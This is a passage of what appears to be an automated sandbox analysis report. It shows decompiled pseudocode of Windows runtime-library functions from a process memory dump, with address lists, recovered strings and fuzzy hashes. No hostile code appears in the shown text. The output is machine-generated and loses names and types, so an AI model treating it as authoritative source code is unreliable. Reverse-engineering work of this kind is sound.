                                                                                          																					if(_t95 != 0) {
                                                                                          																						_t96 =  *_t95;
                                                                                          																						__eflags = _t96;
                                                                                          																						if(_t96 != 0) {
                                                                                          																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                          																							_t40 = _t177 + 0x20;
                                                                                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                          																							__eflags =  *_t40;
                                                                                          																						}
                                                                                          																					}
                                                                                          																				}
                                                                                          																				goto L31;
                                                                                          																			}
                                                                                          																		}
                                                                                          																	}
                                                                                          																}
                                                                                          															}
                                                                                          														}
                                                                                          													} else {
                                                                                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                          														_t106 =  *(_t147 + 0x20);
                                                                                          														__eflags = _t106 & 0x00000040;
                                                                                          														if((_t106 & 0x00000040) != 0) {
                                                                                          															_t147 = E01B6FD22(_t147);
                                                                                          															__eflags = _t147;
                                                                                          															if(_t147 == 0) {
                                                                                          																L41:
                                                                                          																_t130 = 0xc0000001;
                                                                                          																L32:
                                                                                          																_t77 = _t130;
                                                                                          																goto L33;
                                                                                          															} else {
                                                                                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                          																_t106 =  *(_t147 + 0x20);
                                                                                          																goto L17;
                                                                                          															}
                                                                                          															goto L35;
                                                                                          														} else {
                                                                                          															L17:
                                                                                          															_t108 = _t106 | 0x00000080;
                                                                                          															__eflags = _t108;
                                                                                          															 *(_t147 + 0x20) = _t108;
                                                                                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                          															goto L18;
                                                                                          														}
                                                                                          													}
                                                                                          												}
                                                                                          											}
                                                                                          											L33:
                                                                                          										}
                                                                                          									}
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						L35:
                                                                                          						return _t77;
                                                                                          					} else {
                                                                                          						 *_t75 = 0x1c27b80;
                                                                                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                          						 *_t134 = _t75;
                                                                                          						 *0x1c27b84 = _t75;
                                                                                          						_t73 = E01B4EB70(_t134, 0x1c27b60);
                                                                                          						if( *0x1c27b20 != 0) {
                                                                                          							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                          							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                          								_t73 = E01B4FF60( *0x1c27b20);
                                                                                          							}
                                                                                          						}
                                                                                          						goto L5;
                                                                                          					}
                                                                                          				}
                                                                                          			}

















































                                                                                          0x01b6fc38
                                                                                          0x01b6fc3b
                                                                                          0x01b6fc41
                                                                                          0x01babf17
                                                                                          0x01babf19
                                                                                          0x01babf48
                                                                                          0x01babf4b
                                                                                          0x00000000
                                                                                          0x01babf1b
                                                                                          0x01babf22
                                                                                          0x01babf24
                                                                                          0x01babf26
                                                                                          0x00000000
                                                                                          0x01babf2c
                                                                                          0x01babf37
                                                                                          0x01babf39
                                                                                          0x01babf3b
                                                                                          0x00000000
                                                                                          0x01babf41
                                                                                          0x01babf41
                                                                                          0x01babf41
                                                                                          0x01babf41
                                                                                          0x01babf45
                                                                                          0x00000000
                                                                                          0x01babf45
                                                                                          0x01babf3b
                                                                                          0x01babf26
                                                                                          0x00000000
                                                                                          0x01b6fc47
                                                                                          0x01b6fc47
                                                                                          0x01b6fc49
                                                                                          0x01b6fcb2
                                                                                          0x01b6fcb4
                                                                                          0x01b6fcb6
                                                                                          0x01b6fcdc
                                                                                          0x01b6fcdc
                                                                                          0x00000000
                                                                                          0x01b6fcb8
                                                                                          0x01b6fcc3
                                                                                          0x01b6fcc5
                                                                                          0x01b6fcc7
                                                                                          0x00000000
                                                                                          0x01b6fcc9
                                                                                          0x01b6fcc9
                                                                                          0x01b6fccd
                                                                                          0x00000000
                                                                                          0x01b6fccd
                                                                                          0x01b6fcc7
                                                                                          0x00000000
                                                                                          0x01b6fc4b
                                                                                          0x01b6fc4b
                                                                                          0x01b6fc4e
                                                                                          0x01b6fc4e
                                                                                          0x01b6fc51
                                                                                          0x01b6fc51
                                                                                          0x01b6fc54
                                                                                          0x01b6fc5a
                                                                                          0x01b6fc5c
                                                                                          0x01b6fc5f
                                                                                          0x01b6fc61
                                                                                          0x01b6fc63
                                                                                          0x01b6fc65
                                                                                          0x01b6fc67
                                                                                          0x01b6fc6e
                                                                                          0x01b6fc72
                                                                                          0x01b6fc72
                                                                                          0x01b6fc72
                                                                                          0x01b6fc72
                                                                                          0x01b6fc67
                                                                                          0x01b6fc61
                                                                                          0x00000000
                                                                                          0x01b6fc5a
                                                                                          0x01b6fc49
                                                                                          0x01b6fc41
                                                                                          0x01b6fc30
                                                                                          0x01b6fc27
                                                                                          0x01b6fc03
                                                                                          0x01b6fbcd
                                                                                          0x01b6fbd3
                                                                                          0x01b6fbd9
                                                                                          0x01b6fbdc
                                                                                          0x01b6fbde
                                                                                          0x01b6fc99
                                                                                          0x01b6fc9b
                                                                                          0x01b6fc9d
                                                                                          0x01b6fcd5
                                                                                          0x01b6fcd5
                                                                                          0x01b6fc89
                                                                                          0x01b6fc89
                                                                                          0x00000000
                                                                                          0x01b6fc9f
                                                                                          0x01b6fc9f
                                                                                          0x01b6fca3
                                                                                          0x00000000
                                                                                          0x01b6fca3
                                                                                          0x00000000
                                                                                          0x01b6fbe4
                                                                                          0x01b6fbe4
                                                                                          0x01b6fbe4
                                                                                          0x01b6fbe4
                                                                                          0x01b6fbe9
                                                                                          0x01b6fbf2
                                                                                          0x00000000
                                                                                          0x01b6fbf2
                                                                                          0x01b6fbde
                                                                                          0x01b6fbcb
                                                                                          0x01b6fbab
                                                                                          0x01b6fc8b
                                                                                          0x01b6fc8b
                                                                                          0x01b6fc8c
                                                                                          0x01b6fb80
                                                                                          0x01b6fb72
                                                                                          0x01b6fb5e
                                                                                          0x01b6fc8d
                                                                                          0x01b6fc91
                                                                                          0x01b6fadf
                                                                                          0x01b6fadf
                                                                                          0x01b6fae1
                                                                                          0x01b6fae4
                                                                                          0x01b6fae7
                                                                                          0x01b6faec
                                                                                          0x01b6faf8
                                                                                          0x01b6fb00
                                                                                          0x01b6fb07
                                                                                          0x01b6fb0f
                                                                                          0x01b6fb0f
                                                                                          0x01b6fb07
                                                                                          0x00000000
                                                                                          0x01b6faf8
                                                                                          0x01b6fadd

                                                                                          Strings
                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01BABE0F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                          • API String ID: 0-865735534
                                                                                          • Opcode ID: 0a6dbc8b7a2723ae43f19d6bb2d513a964c9495c11fbaf0b9f737634ac141c99
                                                                                          • Instruction ID: 1e8bfbfeed952a9f03e4fa349f6c9dcbd994aaa983b28baa8e3af20c8d0d15fc
                                                                                          • Opcode Fuzzy Hash: 0a6dbc8b7a2723ae43f19d6bb2d513a964c9495c11fbaf0b9f737634ac141c99
                                                                                          • Instruction Fuzzy Hash: 5BA1F471A006069BEB2DDF6CD46077AB7A9FF64710F0446EDEA56DB684DB38D801CB80
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 63%
                                                                                          			E01B32D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                          				signed char _v8;
                                                                                          				signed int _v12;
                                                                                          				signed int _v16;
                                                                                          				signed int _v20;
                                                                                          				signed int _v24;
                                                                                          				intOrPtr _v28;
                                                                                          				intOrPtr _v32;
                                                                                          				signed int _v52;
                                                                                          				void* __esi;
                                                                                          				void* __ebp;
                                                                                          				intOrPtr _t55;
                                                                                          				signed int _t57;
                                                                                          				signed int _t58;
                                                                                          				char* _t62;
                                                                                          				signed char* _t63;
                                                                                          				signed char* _t64;
                                                                                          				signed int _t67;
                                                                                          				signed int _t72;
                                                                                          				signed int _t77;
                                                                                          				signed int _t78;
                                                                                          				signed int _t88;
                                                                                          				intOrPtr _t89;
                                                                                          				signed char _t93;
                                                                                          				signed int _t97;
                                                                                          				signed int _t98;
                                                                                          				signed int _t102;
                                                                                          				signed int _t103;
                                                                                          				intOrPtr _t104;
                                                                                          				signed int _t105;
                                                                                          				signed int _t106;
                                                                                          				signed char _t109;
                                                                                          				signed int _t111;
                                                                                          				void* _t116;
                                                                                          
                                                                                          				_t102 = __edi;
                                                                                          				_t97 = __edx;
                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                          				_t55 =  *[fs:0x18];
                                                                                          				_t109 = __ecx;
                                                                                          				_v8 = __edx;
                                                                                          				_t86 = 0;
                                                                                          				_v32 = _t55;
                                                                                          				_v24 = 0;
                                                                                          				_push(__edi);
                                                                                          				if(__ecx == 0x1c25350) {
                                                                                          					_t86 = 1;
                                                                                          					_v24 = 1;
                                                                                          					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                          				}
                                                                                          				_t103 = _t102 | 0xffffffff;
                                                                                          				if( *0x1c27bc8 != 0) {
                                                                                          					_push(0xc000004b);
                                                                                          					_push(_t103);
                                                                                          					E01B797C0();
                                                                                          				}
                                                                                          				if( *0x1c279c4 != 0) {
                                                                                          					_t57 = 0;
                                                                                          				} else {
                                                                                          					_t57 = 0x1c279c8;
                                                                                          				}
                                                                                          				_v16 = _t57;
                                                                                          				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                          					_t93 = _t109;
                                                                                          					L23();
                                                                                          				}
                                                                                          				_t58 =  *_t109;
                                                                                          				if(_t58 == _t103) {
                                                                                          					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                          					_t58 = _t103;
                                                                                          					if(__eflags == 0) {
                                                                                          						_t93 = _t109;
                                                                                          						E01B61624(_t86, __eflags);
                                                                                          						_t58 =  *_t109;
                                                                                          					}
                                                                                          				}
                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                          				if(_t58 != _t103) {
                                                                                          					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                          				}
                                                                                          				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                          				_t88 = _v16;
                                                                                          				_v28 = _t104;
                                                                                          				L9:
                                                                                          				while(1) {
                                                                                          					if(E01B57D50() != 0) {
                                                                                          						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                          					} else {
                                                                                          						_t62 = 0x7ffe0382;
                                                                                          					}
                                                                                          					if( *_t62 != 0) {
                                                                                          						_t63 =  *[fs:0x30];
                                                                                          						__eflags = _t63[0x240] & 0x00000002;
                                                                                          						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                          							_t93 = _t109;
                                                                                          							E01BCFE87(_t93);
                                                                                          						}
                                                                                          					}
                                                                                          					if(_t104 != 0xffffffff) {
                                                                                          						_push(_t88);
                                                                                          						_push(0);
                                                                                          						_push(_t104);
                                                                                          						_t64 = E01B79520();
                                                                                          						goto L15;
                                                                                          					} else {
                                                                                          						while(1) {
                                                                                          							_t97 =  &_v8;
                                                                                          							_t64 = E01B6E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                          							if(_t64 == 0x102) {
                                                                                          								break;
                                                                                          							}
                                                                                          							_t93 =  *(_t109 + 4);
                                                                                          							_v8 = _t93;
                                                                                          							if((_t93 & 0x00000002) != 0) {
                                                                                          								continue;
                                                                                          							}
                                                                                          							L15:
                                                                                          							if(_t64 == 0x102) {
                                                                                          								break;
                                                                                          							}
                                                                                          							_t89 = _v24;
                                                                                          							if(_t64 < 0) {
                                                                                          								L01B8DF30(_t93, _t97, _t64);
                                                                                          								_push(_t93);
                                                                                          								_t98 = _t97 | 0xffffffff;
                                                                                          								__eflags =  *0x1c26901;
                                                                                          								_push(_t109);
                                                                                          								_v52 = _t98;
                                                                                          								if( *0x1c26901 != 0) {
                                                                                          									_push(0);
                                                                                          									_push(1);
                                                                                          									_push(0);
                                                                                          									_push(0x100003);
                                                                                          									_push( &_v12);
                                                                                          									_t72 = E01B79980();
                                                                                          									__eflags = _t72;
                                                                                          									if(_t72 < 0) {
                                                                                          										_v12 = _t98 | 0xffffffff;
                                                                                          									}
                                                                                          								}
                                                                                          								asm("lock cmpxchg [ecx], edx");
                                                                                          								_t111 = 0;
                                                                                          								__eflags = 0;
                                                                                          								if(0 != 0) {
                                                                                          									__eflags = _v12 - 0xffffffff;
                                                                                          									if(_v12 != 0xffffffff) {
                                                                                          										_push(_v12);
                                                                                          										E01B795D0();
                                                                                          									}
                                                                                          								} else {
                                                                                          									_t111 = _v12;
                                                                                          								}
                                                                                          								return _t111;
                                                                                          							} else {
                                                                                          								if(_t89 != 0) {
                                                                                          									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                          									_t77 = E01B57D50();
                                                                                          									__eflags = _t77;
                                                                                          									if(_t77 == 0) {
                                                                                          										_t64 = 0x7ffe0384;
                                                                                          									} else {
                                                                                          										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                          									}
                                                                                          									__eflags =  *_t64;
                                                                                          									if( *_t64 != 0) {
                                                                                          										_t64 =  *[fs:0x30];
                                                                                          										__eflags = _t64[0x240] & 0x00000004;
                                                                                          										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                          											_t78 = E01B57D50();
                                                                                          											__eflags = _t78;
                                                                                          											if(_t78 == 0) {
                                                                                          												_t64 = 0x7ffe0385;
                                                                                          											} else {
                                                                                          												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                          											}
                                                                                          											__eflags =  *_t64 & 0x00000020;
                                                                                          											if(( *_t64 & 0x00000020) != 0) {
                                                                                          												_t64 = E01BB7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                          											}
                                                                                          										}
                                                                                          									}
                                                                                          								}
                                                                                          								return _t64;
                                                                                          							}
                                                                                          						}
                                                                                          						_t97 = _t88;
                                                                                          						_t93 = _t109;
                                                                                          						E01BCFDDA(_t97, _v12);
                                                                                          						_t105 =  *_t109;
                                                                                          						_t67 = _v12 + 1;
                                                                                          						_v12 = _t67;
                                                                                          						__eflags = _t105 - 0xffffffff;
                                                                                          						if(_t105 == 0xffffffff) {
                                                                                          							_t106 = 0;
                                                                                          							__eflags = 0;
                                                                                          						} else {
                                                                                          							_t106 =  *(_t105 + 0x14);
                                                                                          						}
                                                                                          						__eflags = _t67 - 2;
                                                                                          						if(_t67 > 2) {
                                                                                          							__eflags = _t109 - 0x1c25350;
                                                                                          							if(_t109 != 0x1c25350) {
                                                                                          								__eflags = _t106 - _v20;
                                                                                          								if(__eflags == 0) {
                                                                                          									_t93 = _t109;
                                                                                          									E01BCFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						_push("RTL: Re-Waiting\n");
                                                                                          						_push(0);
                                                                                          						_push(0x65);
                                                                                          						_v20 = _t106;
                                                                                          						E01BC5720();
                                                                                          						_t104 = _v28;
                                                                                          						_t116 = _t116 + 0xc;
                                                                                          						continue;
                                                                                          					}
                                                                                          				}
                                                                                          			}


                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Re-Waiting
                                                                                          • API String ID: 0-316354757
                                                                                          • Opcode ID: 0493953c8f5637dc1a9263c513a8f063a1183d65837b4024657300810805e5e1
                                                                                          • Instruction ID: b0f11bb600d8a526d4a02a87a19edeb4ca8a8ec9caf3bb7f7516e346c3474cbf
                                                                                          • Opcode Fuzzy Hash: 0493953c8f5637dc1a9263c513a8f063a1183d65837b4024657300810805e5e1
                                                                                          • Instruction Fuzzy Hash: F7612571A00655AFDB3AEF6CC885B7EBBB5EB84B20F1402EDD911972C1CB749940C791
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 80%
                                                                                          			E01C00EA5(void* __ecx, void* __edx) {
                                                                                          				signed int _v20;
                                                                                          				char _v24;
                                                                                          				intOrPtr _v28;
                                                                                          				unsigned int _v32;
                                                                                          				signed int _v36;
                                                                                          				intOrPtr _v40;
                                                                                          				char _v44;
                                                                                          				intOrPtr _v64;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				signed int _t58;
                                                                                          				unsigned int _t60;
                                                                                          				intOrPtr _t62;
                                                                                          				char* _t67;
                                                                                          				char* _t69;
                                                                                          				void* _t80;
                                                                                          				void* _t83;
                                                                                          				intOrPtr _t93;
                                                                                          				intOrPtr _t115;
                                                                                          				char _t117;
                                                                                          				void* _t120;
                                                                                          
                                                                                          				_t83 = __edx;
                                                                                          				_t117 = 0;
                                                                                          				_t120 = __ecx;
                                                                                          				_v44 = 0;
                                                                                          				if(E01BFFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                          					L24:
                                                                                          					_t109 = _v44;
                                                                                          					if(_v44 != 0) {
                                                                                          						E01C01074(_t83, _t120, _t109, _t117, _t117);
                                                                                          					}
                                                                                          					L26:
                                                                                          					return _t117;
                                                                                          				}
                                                                                          				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                          				_t5 = _t83 + 1; // 0x1
                                                                                          				_v36 = _t5 << 0xc;
                                                                                          				_v40 = _t93;
                                                                                          				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                          				asm("sbb ebx, ebx");
                                                                                          				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                          				if(_t58 != 0) {
                                                                                          					_push(0);
                                                                                          					_push(0x14);
                                                                                          					_push( &_v24);
                                                                                          					_push(3);
                                                                                          					_push(_t93);
                                                                                          					_push(0xffffffff);
                                                                                          					_t80 = E01B79730();
                                                                                          					_t115 = _v64;
                                                                                          					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                          						_push(_t93);
                                                                                          						E01BFA80D(_t115, 1, _v20, _t117);
                                                                                          						_t83 = 4;
                                                                                          					}
                                                                                          				}
                                                                                          				if(E01BFA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                          					goto L24;
                                                                                          				}
                                                                                          				_t60 = _v32;
                                                                                          				_t97 = (_t60 != 0x100000) + 1;
                                                                                          				_t83 = (_v44 -  *0x1c28b04 >> 0x14) + (_v44 -  *0x1c28b04 >> 0x14);
                                                                                          				_v28 = (_t60 != 0x100000) + 1;
                                                                                          				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                          				_v40 = _t62;
                                                                                          				if(_t83 >= _t62) {
                                                                                          					L10:
                                                                                          					asm("lock xadd [eax], ecx");
                                                                                          					asm("lock xadd [eax], ecx");
                                                                                          					if(E01B57D50() == 0) {
                                                                                          						_t67 = 0x7ffe0380;
                                                                                          					} else {
                                                                                          						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                          					}
                                                                                          					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                          						E01BF138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                          					}
                                                                                          					if(E01B57D50() == 0) {
                                                                                          						_t69 = 0x7ffe0388;
                                                                                          					} else {
                                                                                          						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                          					}
                                                                                          					if( *_t69 != 0) {
                                                                                          						E01BEFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                          					}
                                                                                          					if(( *0x1c28724 & 0x00000008) != 0) {
                                                                                          						E01BF52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                          					}
                                                                                          					_t117 = _v44;
                                                                                          					goto L26;
                                                                                          				}
                                                                                          				while(E01C015B5(0x1c28ae4, _t83, _t97, _t97) >= 0) {
                                                                                          					_t97 = _v28;
                                                                                          					_t83 = _t83 + 2;
                                                                                          					if(_t83 < _v40) {
                                                                                          						continue;
                                                                                          					}
                                                                                          					goto L10;
                                                                                          				}
                                                                                          				goto L24;
                                                                                          			}

























                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `
                                                                                          • API String ID: 0-2679148245
                                                                                          • Opcode ID: a8870863dfc5945ebd38019a1d89b2f28a8bf0323f46fe989e210a77b96de119
                                                                                          • Instruction ID: af8bcaeeaf9a6ce9a4d0f9b3cc081b64061d25a68fe04657fa56f209f56521c6
                                                                                          • Opcode Fuzzy Hash: a8870863dfc5945ebd38019a1d89b2f28a8bf0323f46fe989e210a77b96de119
                                                                                          • Instruction Fuzzy Hash: FB519D71304382DFD726DF28D884B2BBBE5EB84754F08096CFA9697290DB70E905C762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 75%
                                                                                          			E01B6F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                          				intOrPtr _v8;
                                                                                          				intOrPtr _v12;
                                                                                          				intOrPtr _v16;
                                                                                          				char* _v20;
                                                                                          				intOrPtr _v24;
                                                                                          				char _v28;
                                                                                          				intOrPtr _v32;
                                                                                          				char _v36;
                                                                                          				char _v44;
                                                                                          				char _v52;
                                                                                          				intOrPtr _v56;
                                                                                          				char _v60;
                                                                                          				intOrPtr _v72;
                                                                                          				void* _t51;
                                                                                          				void* _t58;
                                                                                          				signed short _t82;
                                                                                          				short _t84;
                                                                                          				signed int _t91;
                                                                                          				signed int _t100;
                                                                                          				signed short* _t103;
                                                                                          				void* _t108;
                                                                                          				intOrPtr* _t109;
                                                                                          
                                                                                          				_t103 = __ecx;
                                                                                          				_t82 = __edx;
                                                                                          				_t51 = E01B54120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                          				if(_t51 >= 0) {
                                                                                          					_push(0x21);
                                                                                          					_push(3);
                                                                                          					_v56 =  *0x7ffe02dc;
                                                                                          					_v20 =  &_v52;
                                                                                          					_push( &_v44);
                                                                                          					_v28 = 0x18;
                                                                                          					_push( &_v28);
                                                                                          					_push(0x100020);
                                                                                          					_v24 = 0;
                                                                                          					_push( &_v60);
                                                                                          					_v16 = 0x40;
                                                                                          					_v12 = 0;
                                                                                          					_v8 = 0;
                                                                                          					_t58 = E01B79830();
                                                                                          					_t87 =  *[fs:0x30];
                                                                                          					_t108 = _t58;
                                                                                          					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                          					if(_t108 < 0) {
                                                                                          						L11:
                                                                                          						_t51 = _t108;
                                                                                          					} else {
                                                                                          						_push(4);
                                                                                          						_push(8);
                                                                                          						_push( &_v36);
                                                                                          						_push( &_v44);
                                                                                          						_push(_v60);
                                                                                          						_t108 = E01B79990();
                                                                                          						if(_t108 < 0) {
                                                                                          							L10:
                                                                                          							_push(_v60);
                                                                                          							E01B795D0();
                                                                                          							goto L11;
                                                                                          						} else {
                                                                                          							_t109 = L01B54620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                          							if(_t109 == 0) {
                                                                                          								_t108 = 0xc0000017;
                                                                                          								goto L10;
                                                                                          							} else {
                                                                                          								_t21 = _t109 + 0x18; // 0x18
                                                                                          								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                          								 *_t109 = 1;
                                                                                          								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                          								 *(_t109 + 0xe) = _t82;
                                                                                          								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                          								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                          								E01B7F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                          								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                          								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                          								_t91 =  *_t103 & 0x0000ffff;
                                                                                          								_t100 = _t91 & 0xfffffffe;
                                                                                          								_t84 = 0x5c;
                                                                                          								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                          									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                          										_push(_v60);
                                                                                          										E01B795D0();
                                                                                          										L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                          										_t51 = 0xc0000106;
                                                                                          									} else {
                                                                                          										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                          										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                          										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                          										goto L5;
                                                                                          									}
                                                                                          								} else {
                                                                                          									L5:
                                                                                          									 *_a4 = _t109;
                                                                                          									_t51 = 0;
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				return _t51;
                                                                                          			}

























                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                          • Instruction ID: d9738bb4d2c91ac07a245b561bb71464c1ef5c64efc4cd3928a91cff55ad2451
                                                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                          • Instruction Fuzzy Hash: 3351AE712047119FC724DF29C840A6BBBF8FF58750F008A6DFAA587690E7B4E904CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 75%
                                                                                          			E01BB3540(intOrPtr _a4) {
                                                                                          				signed int _v12;
                                                                                          				intOrPtr _v88;
                                                                                          				intOrPtr _v92;
                                                                                          				char _v96;
                                                                                          				char _v352;
                                                                                          				char _v1072;
                                                                                          				intOrPtr _v1140;
                                                                                          				intOrPtr _v1148;
                                                                                          				char _v1152;
                                                                                          				char _v1156;
                                                                                          				char _v1160;
                                                                                          				char _v1164;
                                                                                          				char _v1168;
                                                                                          				char* _v1172;
                                                                                          				short _v1174;
                                                                                          				char _v1176;
                                                                                          				char _v1180;
                                                                                          				char _v1192;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				void* __ebp;
                                                                                          				short _t41;
                                                                                          				short _t42;
                                                                                          				intOrPtr _t80;
                                                                                          				intOrPtr _t81;
                                                                                          				signed int _t82;
                                                                                          				void* _t83;
                                                                                          
                                                                                          				_v12 =  *0x1c2d360 ^ _t82;
                                                                                          				_t41 = 0x14;
                                                                                          				_v1176 = _t41;
                                                                                          				_t42 = 0x16;
                                                                                          				_v1174 = _t42;
                                                                                          				_v1164 = 0x100;
                                                                                          				_v1172 = L"BinaryHash";
                                                                                          				_t81 = E01B70BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                          				if(_t81 < 0) {
                                                                                          					L11:
                                                                                          					_t75 = _t81;
                                                                                          					E01BB3706(0, _t81, _t79, _t80);
                                                                                          					L12:
                                                                                          					if(_a4 != 0xc000047f) {
                                                                                          						E01B7FA60( &_v1152, 0, 0x50);
                                                                                          						_v1152 = 0x60c201e;
                                                                                          						_v1148 = 1;
                                                                                          						_v1140 = E01BB3540;
                                                                                          						E01B7FA60( &_v1072, 0, 0x2cc);
                                                                                          						_push( &_v1072);
                                                                                          						E01B8DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                          						E01BC0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                          						_push(_v1152);
                                                                                          						_push(0xffffffff);
                                                                                          						E01B797C0();
                                                                                          					}
                                                                                          					return E01B7B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                          				}
                                                                                          				_t79 =  &_v352;
                                                                                          				_t81 = E01BB3971(0, _a4,  &_v352,  &_v1156);
                                                                                          				if(_t81 < 0) {
                                                                                          					goto L11;
                                                                                          				}
                                                                                          				_t75 = _v1156;
                                                                                          				_t79 =  &_v1160;
                                                                                          				_t81 = E01BB3884(_v1156,  &_v1160,  &_v1168);
                                                                                          				if(_t81 >= 0) {
                                                                                          					_t80 = _v1160;
                                                                                          					E01B7FA60( &_v96, 0, 0x50);
                                                                                          					_t83 = _t83 + 0xc;
                                                                                          					_push( &_v1180);
                                                                                          					_push(0x50);
                                                                                          					_push( &_v96);
                                                                                          					_push(2);
                                                                                          					_push( &_v1176);
                                                                                          					_push(_v1156);
                                                                                          					_t81 = E01B79650();
                                                                                          					if(_t81 >= 0) {
                                                                                          						if(_v92 != 3 || _v88 == 0) {
                                                                                          							_t81 = 0xc000090b;
                                                                                          						}
                                                                                          						if(_t81 >= 0) {
                                                                                          							_t75 = _a4;
                                                                                          							_t79 =  &_v352;
